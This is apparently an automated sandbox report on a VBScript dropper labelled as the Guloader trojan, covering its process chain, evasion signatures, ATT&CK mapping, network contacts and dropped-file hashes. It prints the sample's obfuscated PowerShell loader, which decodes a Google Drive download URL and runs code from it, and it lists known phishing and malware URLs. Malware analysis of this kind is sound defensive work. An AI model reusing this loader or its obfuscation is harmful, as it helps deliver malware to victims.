Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3028
Source: C:\Windows\System32\wscript.exe TID: 5300Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1160Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wscript.exe, 00000000.00000002.1423874364.000001F461949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.1423874364.000001F461949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: wscript.exe, 00000000.00000002.1424370879.000001F461C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1421866994.000001F46199A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388165251.000001F46197A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1424050524.000001F46199B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387704610.000001F461952000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420637116.000001F461989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: wscript.exe, 00000000.00000002.1423874364.000001F461949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
Source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded bVyrr4^+y^m)9j&kJ=wy)ja4^Rx2+"hebGkj{lmK"x)jzJ+v6H&5jSkjzg^+m-(1hv5ki^k(bzw^h8'!'+I^!wkkyay'&rZ!ykib^'^y-zh^imljx,lN)oz;Z7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$storvesirerne = 1;$theologizing='substrin';$theologizing+='g';function rekordjagt($spermosphere){$tryghedsnarkomanerne=$spermosphere.length-$storvesirerne;for($ichthyocentaur=7; $ichthyocentaur -lt $tryghedsnarkomanerne; $ichthyocentaur+=(8)){$cottiers+=$spermosphere.$theologizing.invoke($ichthyocentaur, $storvesirerne);}$cottiers;}function dentagra176($nittenaarsfdselsdag){. ($systematist) ($nittenaarsfdselsdag);}$skrive=rekordjagt 'sammen mrb igttomantramzmice laireformbl chatteldiplom atilsend/skunk r5bomrker. stri.i0revalua ukrist(statuslwinadjusiaco otlnknitweadforure ofjantenwbuttonhsbrugsbe unimpainwienerste.itaxi obriqu1bstern 0kyriali.und,rda0aerodyn; ,uling paedonyw spectriallergenquadric6 ekstem4apodeme; picker femrernx ellekr6exies o4fo,film;.rontag spaan ar disenavvvesf,o:circumf1tryllek2uncompr1unimma,.volemit0rygskst)poriapr ungka lg edderkeungainlcres ectkunlyricosexolog/ovnhuse2 econce0 hummer1sirupsh0notidan0marinae1andengr0erkyndi1trkvogn diamantfnonharmilicen iruncoloueoleatesfnonumbro glasblxkasse t/ hromat1copalin2satanis1 deriva. 
skmtev0hegemon ';$rubys=rekordjagt ' stylteuprosecusorganisefade,urr fjogsf-tyristoaslufssygan.ideceidentitnshowtimtperi on ';$cargoliner=rekordjagt 'ast,roih rep cktslickertwindroapnonj.rasboe,neh:pra inc/estampi/mauveagduranophrmalatesistvnersv c ckiletelefon.trbaadegtornblaononreguo shoalhgbrtsejllkont.nte voltes.retstilcvatteriouncathombaadud,/paavistuinhalercbane.ak?frontene br,dsaxinvocatpv gttaaodk skoprlubricat portef=omtalerdskoleryobrevvekwdubiousnencastel valitogipsdepaunderlodcentime& undefei,adiostdcon,oci=r.kkest1bals mmmmo.dilymkatakin5ar,edtauvalentifamusivea,orelsndphl.benksaloond5statiketkuskenexb,sttelj vovehaivitaliszbewidowecarnosiyovera exald,rmajlhduninwepa.orthdaar,kahankl gjf ventili ,vaporx kanapefunmantlf ma,ked-karav nb vertishado tivv nonadvbs uljaz_quotati ';$constabless=rekordjagt ' acture> immate ';$systematist=rekordjagt 'timbresislavebaebegonerxsjofeli ';$ankyloproctia106 = rekordjagt ' h,ricoe frank comtalenhbeerbibofreedst lewist,%overtypaq,adrisp synonyp straffdserenada rav lsttorpedoa,rachio% h.plit\weekendiusketbarepicantr h erpre electopelephanl konvenabod velcakklimaegoumieracircumsbeurop mlselen gegraablenforsikreudstra s .ursyls h drum.facettesoverratubastedeceuch,or solav k&col.ack&a,gangs goitereansttemccoazervhseniorso proven contigu$apperce ';dentagra176 (rekordjagt ' subcya$journeygmeningol dsboeo su,ersb ilkombagnetacelbibliog:afpa.erhcolumbaybec amepse,plese fluorbrdoerencs lufttreforsyn naf,rismsstrygejiunrustibheldentigla rinl krni.ei draht,tfrictifyozonate=washda,(telefoncsm,dresm hermicdadoxace genvisi/.vlningcadmir l hermov$uncompoaproveninkommandk unrewoy ingva lgrimassohuje trpcowweedrlauds,nokirigamcve.denst betutoicholinea krimin1kl,nset0musikpd6intermi)pharmac ');dentagra176 (rekordjagt 'l gendi$sirrahsgreg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix, one line per tactic column (numbers in parentheses are the report's match counts for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting (221); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter (11); Exploitation for Client Execution (1); PowerShell (3); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Scripting (221); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12); Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID: 1425936; sample: U00b7pdf.vbs; start date: 15/04/2024; architecture: WINDOWS; score: 100)
Process chain: wscript.exe started -> powershell.exe started -> conhost.exe started, cmd.exe started
Network activity (from powershell.exe): drive.usercontent.google.com 142.250.72.129, 443, 49707 GOOGLEUS United States; drive.google.com 172.217.12.142, 443, 49706 GOOGLEUS United States
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Sigma detected: WScript or CScript Dropper
Signatures on wscript.exe: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
Signatures on powershell.exe: Potential dropper URLs found in powershell memory; Found suspicious powershell code related to unpacking or dynamic code loading

Source | Detection | Scanner | Label | Link
U00b7pdf.vbs | 16% | ReversingLabs | Script-WScript.Trojan.Guloader |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://drive.usercontent.googh | 0% | Avira URL Cloud | safe |
http://www.micrt.corAut | 0% | Avira URL Cloud | safe |
https://drive.googP | 0% | Avira URL Cloud | safe |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 172.217.12.142 | true | false | | high
drive.usercontent.google.com | 142.250.72.129 | true | false | | high
windowsupdatebg.s.llnwi.net | 68.142.107.4 | true | false | | unknown
URLs found in process memory (Name / Source / Malicious / Antivirus Detection / Reputation):

Name: https://www.google.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1544405936.0000026161671000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: URL Reputation: malware
Reputation: unknown

Name: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://go.micro
Source: powershell.exe, 00000002.00000002.1544405936.0000026160B8D000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://drive.googP
Source: powershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCB4000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.micrt.corAut
Source: powershell.exe, 00000002.00000002.1544110626.000002615F641000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.12.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.72.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1425936
                                Start date and time:2024-04-15 07:25:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:U00b7pdf.vbs
                                renamed because original name is a hash value
                                Original Sample Name:() 24 (240415)pdf.vbs
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winVBS@6/7@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 68.142.107.4
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 6500 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: U00b7pdf.vbs
Time | Type | Description
07:26:03 | API Interceptor | 1x Sleep call for process: wscript.exe modified
07:26:08 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
windowsupdatebg.s.llnwi.net | https://www.renouvellement-netflix.info/login/login | malicious | Unknown | 68.142.107.4
 | https://pub-03263fcf19fc4520ae33bf72c8aca2bb.r2.dev/pick.html | malicious | HTMLPhisher | 68.142.107.4
 | https://netfimarketing.com/o2fa9b5aaq11814e4b398b42a0fs16bbb048.html | malicious | Unknown | 68.142.107.4
 | https://winalertpor-error0x22908-alert-virus-detected.pages.dev/AnDrCdEr00d0CH808Err0r8An00Dr01/ | malicious | Unknown | 68.142.107.4
 | https://loia.co.nz/news/ | malicious | Unknown | 68.142.107.4
 | F5ZC1F67nf.exe | malicious | CobaltStrike, Metasploit, ReflectiveLoader | 68.142.107.4
 | F5ZC1F67nf.exe | malicious | CobaltStrike | 68.142.107.4
 | https://answer-paycustomer.com/ | malicious | Unknown | 68.142.107.4
 | https://enjucm-6424.anotudhoeah.workers.dev/8dc0c739-61df-4e9d-9bd9-b5bc957356bf | malicious | HTMLPhisher | 68.142.107.4
 | https://liberty-d8x.pages.dev/ | malicious | HTMLPhisher | 68.142.107.4
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | bU8H.exe | malicious | XWorm | 172.217.12.142, 142.250.72.129
 | tqtYy7oBD5.exe | malicious | PureLog Stealer | 172.217.12.142, 142.250.72.129
 | tqtYy7oBD5.exe | malicious | PureLog Stealer | 172.217.12.142, 142.250.72.129
 | GxrG78Getq.exe | malicious | AsyncRAT, Blackshades, Quasar, StormKitty, WorldWind Stealer | 172.217.12.142, 142.250.72.129
 | a3.cmd | malicious | Unknown | 172.217.12.142, 142.250.72.129
 | y60H9hymbN.exe | malicious | XWorm | 172.217.12.142, 142.250.72.129
 | 8783013BDBB0B9D9093B06792388A23ADF9E6A2A1749B.exe | malicious | DCRat | 172.217.12.142, 142.250.72.129
 | https://mail.accedi.45-88-90-150.cprapid.com/ | malicious | PayPal Phisher | 172.217.12.142, 142.250.72.129
 | https://zjxcjld.com/ | malicious | Unknown | 172.217.12.142, 142.250.72.129
 | WK6RB9ih.posh.ps1 | malicious | PoshC2 | 172.217.12.142, 142.250.72.129
                                No context
                                Process:C:\Windows\System32\wscript.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):69993
                                Entropy (8bit):7.99584879649948
                                Encrypted:true
                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Process:C:\Windows\System32\wscript.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):290
                                Entropy (8bit):2.9404395889614783
                                Encrypted:false
                                SSDEEP:6:kKZXlbN+SkQlPlEGYRMY9z+4KlDA3RUe/:xlUkPlE99SNxAhUe/
                                MD5:79564A0AF63B5B4D7F7522BAA43A4756
                                SHA1:C23F41AAD774BDD7C7A096CAC0F5306D6FB02441
                                SHA-256:D9129F79642A69E760FFA627B9AEC21DD92B324D46601ACAE642D622E9EFA8FA
                                SHA-512:495171606D9D1CC146CF85E59A6B23170ACD657811DC93E1B66A8AFAC05D0C36EEBBC5F3CE97C064F61469194F2F67A43A31FEE2117C224FE29471DFCB438EFC
                                Malicious:false
                                Reputation:low
Preview: (binary header, then UTF-16 text) http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllulbnolz:NllUc
                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\System32\wscript.exe
                                File Type:ASCII text, with very long lines (8741), with no line terminators
                                Category:dropped
                                Size (bytes):8741
                                Entropy (8bit):5.137579435081593
                                Encrypted:false
                                SSDEEP:192:BHDSZK0YV6Yk4JGlFbits7e1hvNpZ4icnAwMJ5mCNj6NBiijHG9p:1DSZK0YV6B4JGPGts7e1Tp+ANFIzU
                                MD5:9105A7AC832AB00FCA96838AD8B2E719
                                SHA1:BD6F8B52C934BD17318D62C76E6B44A88A4EF08D
                                SHA-256:13CDD6DF9CE201D6C211761D1C5EA377FC205C998287FBC9D23A6472FEFE6814
                                SHA-512:A983FBA27ABA636CCC36316CD756CF928116B25CA15EB0C35C66F713021E65965AF0FD2A5EFB6BA11D273E04371DD1A9174CC2ABA0874953D4B99BDDEDE016C5
                                Malicious:false
                                Reputation:low
                                Preview:powershell "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn Diam
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                Category:dropped
                                Size (bytes):1692
                                Entropy (8bit):5.1057817841798885
                                Encrypted:false
                                SSDEEP:24:hazsp1XrSlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7p1cmRq+fjsueFYaWJ
                                MD5:197667AD8277E48B84986E653C8415B8
                                SHA1:9065037A8357F66D45B75FBF1FF864A42F216173
                                SHA-256:8CD3537A4D1D6EE904355E2731F0E57432CBD34897C58B31A7F9B39968494000
                                SHA-512:6125B95290CCCAB07DDAE4A44C1868AE86A6473A6167C5713C404ED3F911AC5459544A466E56F212103F5A3FDB96B3CF82F3914C5D079BBC92C6AF3495903DC9
                                Malicious:false
